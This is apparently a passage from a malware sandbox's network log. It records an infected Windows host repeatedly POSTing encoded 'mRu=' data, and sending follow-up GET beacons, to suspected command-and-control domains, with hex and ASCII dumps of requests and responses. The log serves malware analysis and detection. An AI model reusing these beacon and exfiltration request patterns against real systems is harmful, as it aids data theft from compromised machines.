Nov 12, 2024 15:35:04.749439001 CET	741	OUT	POST /wie9/ HTTP/1.1 Host: www.jigg.space Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US Accept-Encoding: gzip, deflate, br Origin: http://www.jigg.space Referer: http://www.jigg.space/wie9/ Content-Type: application/x-www-form-urlencoded Content-Length: 200 Connection: close Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.104 AOL/9.8 AOLBuild/4346.13.US Safari/537.36 Data Raw: 6d 52 75 3d 6f 4a 54 76 38 41 46 67 51 56 33 45 62 76 39 58 55 58 59 72 4b 59 77 33 76 4e 65 39 6d 31 52 42 71 6d 53 6c 6a 32 2b 4e 7a 52 57 49 31 33 71 31 64 4e 7a 2b 73 78 48 4a 78 65 73 66 76 4f 38 31 76 50 47 62 4f 4a 67 4e 42 6d 53 67 71 78 48 59 51 51 2f 73 32 74 50 52 76 74 74 59 4f 75 58 4b 7a 59 51 49 6e 6a 57 66 36 5a 2b 45 64 76 69 57 50 53 4a 4d 63 39 51 5a 57 31 58 41 67 66 31 6f 2f 43 4d 53 7a 5a 7a 56 59 4f 54 58 6f 49 30 66 77 31 68 66 67 48 47 70 71 71 46 74 73 71 34 73 39 56 48 38 47 46 77 30 69 6e 79 65 30 46 5a 72 6c 4c 4f 44 77 63 38 36 72 6c 71 68 57 2b 52 6f 6e 41 3d 3d Data Ascii: mRu=oJTv8AFgQV3Ebv9XUXYrKYw3vNe9m1RBqmSlj2+NzRWI13q1dNz+sxHJxesfvO81vPGbOJgNBmSgqxHYQQ/s2tPRvttYOuXKzYQInjWf6Z+EdviWPSJMc9QZW1XAgf1o/CMSzZzVYOTXoI0fw1hfgHGpqqFtsq4s9VH8GFw0inye0FZrlLODwc86rlqhW+RonA==
Nov 12, 2024 15:35:04.884165049 CET	759	IN	HTTP/1.1 403 Forbidden server: openresty/1.13.6.1 date: Tue, 12 Nov 2024 14:35:04 GMT content-type: text/html content-length: 577 x-fail-reason: Bad Actor connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 31 33 2e 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 [TRUNCATED] Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>openresty/1.13.6.1</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port
87	192.168.11.20	49806	173.255.194.134	80

Timestamp	Bytes transferred	Direction	Data
Nov 12, 2024 15:35:07.422977924 CET	761	OUT	POST /wie9/ HTTP/1.1 Host: www.jigg.space Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US Accept-Encoding: gzip, deflate, br Origin: http://www.jigg.space Referer: http://www.jigg.space/wie9/ Content-Type: application/x-www-form-urlencoded Content-Length: 220 Connection: close Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.104 AOL/9.8 AOLBuild/4346.13.US Safari/537.36 Data Raw: 6d 52 75 3d 6f 4a 54 76 38 41 46 67 51 56 33 45 62 4f 74 58 59 55 41 72 4d 34 77 30 78 64 65 39 73 56 52 2f 71 6d 4f 6c 6a 7a 47 64 7a 69 79 49 31 57 61 31 63 4d 7a 2b 67 52 48 4a 6c 4f 74 56 68 75 38 41 76 50 43 31 4f 49 63 4e 42 6d 47 67 71 7a 66 59 4d 33 4c 74 30 39 50 54 6a 4e 74 61 4b 75 58 4b 7a 59 51 49 6e 6a 43 35 36 66 57 45 63 66 53 57 50 7a 4a 50 41 74 51 65 66 56 58 41 78 50 31 30 2f 43 4e 46 7a 64 7a 7a 59 49 58 58 6f 4a 6b 66 77 6e 4a 63 7a 6e 47 76 30 61 45 46 39 71 68 65 38 52 50 42 4f 56 38 6b 36 69 36 6e 38 7a 55 78 34 35 36 6e 7a 50 67 49 76 56 54 4a 55 38 51 7a 36 4b 55 58 4c 5a 6e 6a 58 33 55 77 5a 32 49 54 79 7a 50 53 6d 6b 30 3d Data Ascii: mRu=oJTv8AFgQV3EbOtXYUArM4w0xde9sVR/qmOljzGdziyI1Wa1cMz+gRHJlOtVhu8AvPC1OIcNBmGgqzfYM3Lt09PTjNtaKuXKzYQInjC56fWEcfSWPzJPAtQefVXAxP10/CNFzdzzYIXXoJkfwnJcznGv0aEF9qhe8RPBOV8k6i6n8zUx456nzPgIvVTJU8Qz6KUXLZnjX3UwZ2ITyzPSmk0=
Nov 12, 2024 15:35:07.558279037 CET	759	IN	HTTP/1.1 403 Forbidden server: openresty/1.13.6.1 date: Tue, 12 Nov 2024 14:35:07 GMT content-type: text/html content-length: 577 x-fail-reason: Bad Actor connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 31 33 2e 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 [TRUNCATED] Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>openresty/1.13.6.1</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port
88	192.168.11.20	49807	173.255.194.134	80

Timestamp	Bytes transferred	Direction	Data
Nov 12, 2024 15:35:10.092005014 CET	1289	OUT	POST /wie9/ HTTP/1.1 Host: www.jigg.space Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US Accept-Encoding: gzip, deflate, br Origin: http://www.jigg.space Referer: http://www.jigg.space/wie9/ Content-Type: application/x-www-form-urlencoded Content-Length: 7368 Connection: close Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.104 AOL/9.8 AOLBuild/4346.13.US Safari/537.36 Data Raw: 6d 52 75 3d 6f 4a 54 76 38 41 46 67 51 56 33 45 62 4f 74 58 59 55 41 72 4d 34 77 30 78 64 65 39 73 56 52 2f 71 6d 4f 6c 6a 7a 47 64 7a 69 36 49 31 41 4f 31 64 76 62 2b 68 52 48 4a 6d 4f 74 55 68 75 38 6e 76 4c 75 78 4f 49 51 37 42 6a 43 67 72 53 2f 59 63 46 6a 74 39 39 50 54 38 39 74 5a 4f 75 58 66 7a 59 41 45 6e 6a 53 35 36 66 57 45 63 63 4b 57 47 43 4a 50 43 74 51 5a 57 31 58 63 67 66 31 49 2f 43 46 56 7a 64 33 38 59 34 33 58 6f 6f 55 66 6a 69 56 63 77 48 47 74 31 61 45 64 39 71 64 46 38 52 37 33 4f 56 59 4b 36 6c 47 6e 2b 79 73 72 71 34 43 49 70 74 6f 34 6c 55 6e 44 44 71 51 4e 6c 36 34 50 4b 36 4c 44 57 42 49 6a 66 6b 59 6d 6e 78 36 56 6b 51 77 69 42 6e 35 70 59 72 76 39 6b 4c 52 77 52 74 50 44 54 73 68 54 4d 2b 30 5a 53 76 51 6c 52 2b 2b 39 4f 45 49 4a 35 6e 6a 59 55 2f 41 59 6c 73 47 48 71 64 52 44 53 37 46 4c 75 59 54 65 66 78 6e 47 4c 46 43 46 74 41 63 47 71 4d 72 42 32 39 4c 69 39 77 6f 66 62 67 66 41 68 56 31 56 5a 71 43 56 74 50 58 78 53 4d 66 72 66 6e 54 55 69 77 57 2f 4b 53 59 38 73 53 [TRUNCATED] Data Ascii: mRu=oJTv8AFgQV3EbOtXYUArM4w0xde9sVR/qmOljzGdzi6I1AO1dvb+hRHJmOtUhu8nvLuxOIQ7BjCgrS/YcFjt99PT89tZOuXfzYAEnjS56fWEccKWGCJPCtQZW1Xcgf1I/CFVzd38Y43XooUfjiVcwHGt1aEd9qdF8R73OVYK6lGn+ysrq4CIpto4lUnDDqQNl64PK6LDWBIjfkYmnx6VkQwiBn5pYrv9kLRwRtPDTshTM+0ZSvQlR++9OEIJ5njYU/AYlsGHqdRDS7FLuYTefxnGLFCFtAcGqMrB29Li9wofbgfAhV1VZqCVtPXxSMfrfnTUiwW/KSY8sS+bavf1nRI6nnwmCZ8O21H98NH7aWSUIgttjdgpC74RtdWCUp4SX3PFRfuPMU0UiVKYMqRWsYGcE5h3NKudijqnEAeHarxFvBUyg/tTGtM3EiQSGbcs/vglAXC/KVh1Z7rNYe7iSfE4tzuMJukzTU2vB5gfwKTeF8ziV7WlgQsT1EA1iTi36jhXgH+xW57zht8CB4oLZ1YNkEQB96oM1AuOuaenFrgp8ZBODnyTzvr/mcm6p+R2yJLmDA9agzw/5vZQ3ywpgeH7SCVO9MtK1oZ6toYjGhqdf2dpman3ky8eNsUmf+18EfR2v9DHfMOkJ/dYCbhxK+/MteWLvyqfqEnZWj1mzTR8fW/ihqIr6qTveVQ4dIJs/OazHCkzgmPZ2qZcfwBAQijyllvfOeerPg/xph+
Nov 12, 2024 15:35:10.092051983 CET	5156	OUT	Data Raw: 4b 46 43 6b 32 59 45 47 37 30 35 65 42 62 32 6b 38 68 6f 48 6e 51 4c 50 35 6c 72 70 44 77 54 77 4a 50 31 33 56 66 67 58 55 76 37 6f 4a 67 41 50 67 76 75 38 39 46 70 77 6b 65 43 36 35 75 49 2f 4f 49 72 55 49 61 42 54 4c 72 4a 71 31 32 75 43 2f 72 Data Ascii: KFCk2YEG705eBb2k8hoHnQLP5lrpDwTwJP13VfgXUv7oJgAPgvu89FpwkeC65uI/OIrUIaBTLrJq12uC/rzzuebVSL01k/7wIqwYS4Xxil7zfPuJAatd2DoQue0S9qFtp4qc/ItkY+m2gRHnMSDz9cXGfTgRoE3Jg64iDuD7xkc5ausWENONx9t3e3IOFzETsG+lbqultLZ9WyraLbwSg4AEubIF9C+9b8t9Pi3dYXBbzSu+gRg
Nov 12, 2024 15:35:10.092098951 CET	1289	OUT	Data Raw: 4f 33 76 65 43 30 67 75 73 66 4e 4f 63 75 6e 74 38 47 66 47 4a 39 70 53 65 73 39 4e 77 41 47 44 64 50 4d 38 4e 76 4d 47 68 34 6b 55 52 41 7a 72 48 76 6d 34 54 50 74 75 76 77 64 6f 4a 39 76 42 31 6d 73 43 44 38 43 36 47 6e 69 4b 2f 45 53 6c 52 6f Data Ascii: O3veC0gusfNOcunt8GfGJ9pSes9NwAGDdPM8NvMGh4kURAzrHvm4TPtuvwdoJ9vB1msCD8C6GniK/ESlRo5m4ntyv14mo00qqBz3MSnrVj3hTC6881hFwqsToUlhSGvIXHBIO9sp8JtzIq3HeKE8W+lYUliGDpmVp0NGgHITug++SkqHw8yCNa1ZQ4re0UkxYywWnHvL7laVyKBeJk4AJ9x6grwxtdTMun/XjO7kkZixjcDYFzm
Nov 12, 2024 15:35:10.092307091 CET	176	OUT	Data Raw: 6c 59 71 49 4f 76 72 79 46 65 35 41 6f 4c 49 52 55 46 79 4c 45 37 30 71 44 4e 30 6b 55 2b 45 37 42 30 79 4b 59 61 50 38 6c 6c 55 69 2b 2f 6e 74 2f 55 67 78 65 6e 78 45 6f 4d 74 6c 63 57 6e 59 54 6b 7a 57 75 4b 6e 2b 67 57 45 2b 70 74 4a 6d 41 4d Data Ascii: lYqIOvryFe5AoLIRUFyLE70qDN0kU+E7B0yKYaP8llUi+/nt/UgxenxEoMtlcWnYTkzWuKn+gWE+ptJmAMCOj5tIhLedj9Do7WDZnsPkcVZznX6d/bgpKy+3Wh2kyPOUT+tc7+7j4Dgc89C6ZiuWuXNth9gnRQ9oQF7kaLhGMGf9zg==
Nov 12, 2024 15:35:10.226948023 CET	299	IN	HTTP/1.1 200 OK server: openresty/1.13.6.1 date: Tue, 12 Nov 2024 14:35:10 GMT content-type: application/octet-stream content-length: 110 content-type: text/html connection: close Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 77 77 77 2e 6a 69 67 67 2e 73 70 61 63 65 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 77 77 77 2e 6a 69 67 67 2e 73 70 61 63 65 3c 2f 68 31 3e 3c 70 3e 43 6f 6d 69 6e 67 20 73 6f 6f 6e 2e 3c 2f 70 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>www.jigg.space</title></head><body><h1>www.jigg.space</h1><p>Coming soon.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
89	192.168.11.20	49808	173.255.194.134	80

Timestamp	Bytes transferred	Direction	Data
Nov 12, 2024 15:35:12.760833979 CET	473	OUT	GET /wie9/?mRu=lL7P/0JUYVbqWckkUFA5AZs0yLHF2CZptxiRtFaWww2Jt1+4Ybj8qDPeqsoco5xM//SPE5hjfF332jPzZ07z97WSr/ctCPXD3Kda+wiI2ZiEZuGqb25QMsE=&UJ=7H1XM HTTP/1.1 Host: www.jigg.space Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.104 AOL/9.8 AOLBuild/4346.13.US Safari/537.36
Nov 12, 2024 15:35:12.896985054 CET	299	IN	HTTP/1.1 200 OK server: openresty/1.13.6.1 date: Tue, 12 Nov 2024 14:35:12 GMT content-type: application/octet-stream content-length: 110 content-type: text/html connection: close Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 77 77 77 2e 6a 69 67 67 2e 73 70 61 63 65 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 77 77 77 2e 6a 69 67 67 2e 73 70 61 63 65 3c 2f 68 31 3e 3c 70 3e 43 6f 6d 69 6e 67 20 73 6f 6f 6e 2e 3c 2f 70 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>www.jigg.space</title></head><body><h1>www.jigg.space</h1><p>Coming soon.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
90	192.168.11.20	49809	3.33.130.190	80

Timestamp	Bytes transferred	Direction	Data
Nov 12, 2024 15:35:18.046612978 CET	768	OUT	POST /cbd3/ HTTP/1.1 Host: www.econsultoria.online Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US Accept-Encoding: gzip, deflate, br Origin: http://www.econsultoria.online Referer: http://www.econsultoria.online/cbd3/ Content-Type: application/x-www-form-urlencoded Content-Length: 200 Connection: close Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.104 AOL/9.8 AOLBuild/4346.13.US Safari/537.36 Data Raw: 6d 52 75 3d 4b 55 58 46 64 64 69 6a 63 73 36 51 6c 59 36 6e 67 39 59 30 69 4f 68 49 73 6c 73 72 66 4b 66 49 33 78 42 37 2f 63 48 4e 62 57 79 70 58 50 33 75 5a 30 61 46 71 44 4a 76 74 35 61 37 34 30 54 34 53 46 46 2b 44 33 78 42 57 33 41 44 7a 64 43 72 48 32 46 62 64 6b 69 43 63 33 4a 6e 77 43 70 38 6d 5a 6d 4f 6d 42 39 79 67 30 4e 4a 6a 2f 76 5a 53 46 50 30 54 4d 71 4e 4e 76 66 46 31 65 56 56 36 49 6a 52 6d 65 67 2b 6a 59 6d 64 4a 4a 66 4c 72 6e 59 6b 71 6a 72 34 72 6c 62 33 62 4b 30 53 74 36 78 54 4e 41 61 4d 4f 39 69 46 67 6f 43 4c 4d 47 72 2b 76 4b 7a 62 41 30 6d 39 33 74 75 59 4c 51 3d 3d Data Ascii: mRu=KUXFddijcs6QlY6ng9Y0iOhIslsrfKfI3xB7/cHNbWypXP3uZ0aFqDJvt5a740T4SFF+D3xBW3ADzdCrH2FbdkiCc3JnwCp8mZmOmB9yg0NJj/vZSFP0TMqNNvfF1eVV6IjRmeg+jYmdJJfLrnYkqjr4rlb3bK0St6xTNAaMO9iFgoCLMGr+vKzbA0m93tuYLQ==

Session ID	Source IP	Source Port	Destination IP	Destination Port
91	192.168.11.20	49810	3.33.130.190	80

Timestamp	Bytes transferred	Direction	Data
Nov 12, 2024 15:35:20.702032089 CET	788	OUT	POST /cbd3/ HTTP/1.1 Host: www.econsultoria.online Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US Accept-Encoding: gzip, deflate, br Origin: http://www.econsultoria.online Referer: http://www.econsultoria.online/cbd3/ Content-Type: application/x-www-form-urlencoded Content-Length: 220 Connection: close Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.104 AOL/9.8 AOLBuild/4346.13.US Safari/537.36 Data Raw: 6d 52 75 3d 4b 55 58 46 64 64 69 6a 63 73 36 51 6b 35 4b 6e 69 63 59 30 67 75 68 4c 31 56 73 72 4b 61 65 50 33 78 64 37 2f 64 7a 64 63 6a 61 70 58 75 48 75 61 78 75 46 76 44 4a 76 31 70 61 2b 6c 45 54 7a 53 46 5a 4d 44 31 31 42 57 33 38 44 7a 59 2b 72 48 6e 46 59 66 30 69 41 51 58 4a 66 2b 69 70 38 6d 5a 6d 4f 6d 42 70 63 67 30 56 4a 6a 50 2f 5a 51 6b 50 33 51 4d 71 4f 64 2f 66 46 78 65 56 52 36 49 6a 7a 6d 62 4a 70 6a 61 65 64 4a 4d 6a 4c 72 32 59 6e 2f 54 72 2b 6c 46 61 79 59 59 39 31 71 70 6c 73 63 78 75 2f 49 75 53 76 68 2b 50 52 52 30 66 61 73 5a 76 70 45 45 66 56 31 76 76 44 57 5a 41 6c 55 5a 49 52 67 36 79 39 4d 77 67 6b 46 63 45 56 73 44 34 3d Data Ascii: mRu=KUXFddijcs6Qk5KnicY0guhL1VsrKaeP3xd7/dzdcjapXuHuaxuFvDJv1pa+lETzSFZMD11BW38DzY+rHnFYf0iAQXJf+ip8mZmOmBpcg0VJjP/ZQkP3QMqOd/fFxeVR6IjzmbJpjaedJMjLr2Yn/Tr+lFayYY91qplscxu/IuSvh+PRR0fasZvpEEfV1vvDWZAlUZIRg6y9MwgkFcEVsD4=

Session ID	Source IP	Source Port	Destination IP	Destination Port
92	192.168.11.20	49811	3.33.130.190	80

Timestamp	Bytes transferred	Direction	Data
Nov 12, 2024 15:35:23.354790926 CET	2578	OUT	POST /cbd3/ HTTP/1.1 Host: www.econsultoria.online Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US Accept-Encoding: gzip, deflate, br Origin: http://www.econsultoria.online Referer: http://www.econsultoria.online/cbd3/ Content-Type: application/x-www-form-urlencoded Content-Length: 7368 Connection: close Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.104 AOL/9.8 AOLBuild/4346.13.US Safari/537.36 Data Raw: 6d 52 75 3d 4b 55 58 46 64 64 69 6a 63 73 36 51 6b 35 4b 6e 69 63 59 30 67 75 68 4c 31 56 73 72 4b 61 65 50 33 78 64 37 2f 64 7a 64 63 6a 43 70 51 63 50 75 61 57 79 46 6f 44 4a 76 72 35 61 2f 6c 45 54 75 53 46 52 49 44 31 70 37 57 78 34 44 68 4b 6d 72 51 44 5a 59 46 6b 69 41 59 33 4a 6b 77 43 6f 6b 6d 64 43 30 6d 42 35 63 67 30 56 4a 6a 4e 33 5a 55 31 50 33 57 4d 71 4e 4e 76 66 4a 31 65 56 35 36 4d 50 4a 6d 62 46 35 6a 70 57 64 4a 73 54 4c 73 45 77 6e 6a 44 72 38 6f 6c 61 55 59 59 68 71 71 70 70 47 63 79 7a 53 49 73 79 76 6a 5a 7a 4c 46 45 54 33 2f 50 79 6b 46 48 6e 6a 32 75 33 42 54 4b 51 33 45 66 6f 67 6d 38 71 6c 50 32 67 38 43 73 51 42 36 6b 42 52 31 55 36 57 36 63 6b 58 6e 36 72 43 35 4d 56 7a 47 6e 71 65 41 50 64 63 72 77 6a 4a 4f 36 79 2b 37 41 6d 58 36 65 30 51 30 32 2f 42 6d 36 79 53 37 2f 49 61 79 39 39 63 53 71 75 69 47 4c 66 53 71 72 53 4f 30 79 32 79 2b 68 5a 31 61 47 5a 31 72 56 36 6b 42 54 54 2f 46 67 54 2f 70 64 37 39 34 4a 65 6d 75 53 62 56 4a 49 4c 5a 4c 48 4a 76 56 38 33 71 42 67 [TRUNCATED] Data Ascii: mRu=KUXFddijcs6Qk5KnicY0guhL1VsrKaeP3xd7/dzdcjCpQcPuaWyFoDJvr5a/lETuSFRID1p7Wx4DhKmrQDZYFkiAY3JkwCokmdC0mB5cg0VJjN3ZU1P3WMqNNvfJ1eV56MPJmbF5jpWdJsTLsEwnjDr8olaUYYhqqppGcyzSIsyvjZzLFET3/PykFHnj2u3BTKQ3Efogm8qlP2g8CsQB6kBR1U6W6ckXn6rC5MVzGnqeAPdcrwjJO6y+7AmX6e0Q02/Bm6yS7/Iay99cSquiGLfSqrSO0y2y+hZ1aGZ1rV6kBTT/FgT/pd794JemuSbVJILZLHJvV83qBg9Ky6l1l7Wr56rYT25XIYqIKL6RTXYBBH457UlWCWiVOBl5schx4hY+lb8nowKkxzp4P0J1FGSg9clD37Z+izkitT5wUWfO57ieaMaaJhwz83qK44JwMycIfNBit5WckEeaZPu1c8WKJOG7YajjrtwHfN/KxsIs7tvNCQVUSgt7nTRK+J5AeP2qetTdDnyKCtDUGVf/nCwnYpN/PiK/+RIo8rTji49yVBSwO3sJFZrKMETgVzlriys3k1iqd72frc4M3yrjelxtOVGhsT94PgNkBfcRyaQwuOFCuRGnXv/ph19X3bOUGG8hiQrW8o45EhmXJKtOZuO4S/kW9OnbugCIF9zn3xrQPOO2GzIpIjyAcoUwQjcN4/fR7LJaeLon6rWh+Q/511XAt6vqfHAruewkJd86Ez4we8MKiMJfE9bpnObRim3hS/DPpBzre1cv+6qXrgxJEPRE7XaFuYRtxW5u7ZwAcvl4eilqc6z+QFMFnvfVnPuU/Bri3h3ecj2BKJGmYf3ALTm0YCTVPHzK4mt/kVgDjIjr408iHI502zniU4gwJYNfgndfvmJqAxGMhF+DraB6XFP13u1o4G5e2RYho9b5WdBMwfi4CLlZwmNwI3IGtN7SEAnrJoK711B7wxwq/tFi3uNG7/ztF2llbPROkwtelgB2epRo [TRUNCATED]
Nov 12, 2024 15:35:23.354824066 CET	5156	OUT	Data Raw: 71 30 4a 48 30 74 69 52 6d 36 4b 33 35 35 41 73 39 63 48 49 67 36 59 58 4f 62 53 76 6d 4d 6c 31 37 79 53 37 4e 59 45 57 59 43 30 6b 5a 68 75 48 77 68 59 52 2f 77 46 63 4e 42 4a 33 50 76 47 63 77 69 44 2b 72 32 4d 4d 6a 68 71 53 53 42 55 32 2f 64 Data Ascii: q0JH0tiRm6K355As9cHIg6YXObSvmMl17yS7NYEWYC0kZhuHwhYR/wFcNBJ3PvGcwiD+r2MMjhqSSBU2/dHfFogXnBzh4son/31eJEZ7qR1n8RKfiOsvPM1B9RS1IJ54q+Hr/ARyB9bND0QG/HDGs1oW8gYtTnzLbVG5LScsK3etobclDNiIN3pCtzL7KU5cbaBh0hp+BlnAqq37E+FRneJ5zvp6NY/XKXUqv0Ig+HDVZlb7+6b
Nov 12, 2024 15:35:23.354899883 CET	203	OUT	Data Raw: 41 47 63 62 6c 72 4c 38 63 38 36 55 2f 4a 62 73 39 37 79 32 39 73 38 6b 62 31 61 53 58 4a 2f 4b 7a 56 71 50 2b 6d 61 67 56 51 55 31 6e 79 77 32 49 37 59 69 49 57 65 2b 48 57 48 6a 57 6f 49 47 78 44 32 41 36 71 37 63 54 30 6e 6f 4e 54 51 5a 68 4b Data Ascii: AGcblrL8c86U/Jbs97y29s8kb1aSXJ/KzVqP+magVQU1nyw2I7YiIWe+HWHjWoIGxD2A6q7cT0noNTQZhKj0UwjkwYQD03Rw1pguNyiBkeJ1SBYhVQTNGQOzf+p1RkBYLwMz5MQI/rMdDSVSt1C2oM6hu59ZrJCut+zX9yw4dtu4j7643SKE9YUU0J4fAd9rL77ZgtOMw==

Session ID	Source IP	Source Port	Destination IP	Destination Port
93	192.168.11.20	49812	3.33.130.190	80

Timestamp	Bytes transferred	Direction	Data
Nov 12, 2024 15:35:26.025338888 CET	482	OUT	GET /cbd3/?mRu=HW/lerOyVqCXu7n0t/EUlYJ02y1yNdHzoGstxvzncQbYfsbQeR2dtxxMvMPrm1eSchBLBkAlfh8ey4GsUHcWZCjdVQ1E0is8tfiw+yJHiCAhhuX0KyTHXeE=&UJ=7H1XM HTTP/1.1 Host: www.econsultoria.online Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.104 AOL/9.8 AOLBuild/4346.13.US Safari/537.36
Nov 12, 2024 15:35:26.164432049 CET	388	IN	HTTP/1.1 200 OK Server: openresty Date: Tue, 12 Nov 2024 14:35:26 GMT Content-Type: text/html Content-Length: 248 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 6d 52 75 3d 48 57 2f 6c 65 72 4f 79 56 71 43 58 75 37 6e 30 74 2f 45 55 6c 59 4a 30 32 79 31 79 4e 64 48 7a 6f 47 73 74 78 76 7a 6e 63 51 62 59 66 73 62 51 65 52 32 64 74 78 78 4d 76 4d 50 72 6d 31 65 53 63 68 42 4c 42 6b 41 6c 66 68 38 65 79 34 47 73 55 48 63 57 5a 43 6a 64 56 51 31 45 30 69 73 38 74 66 69 77 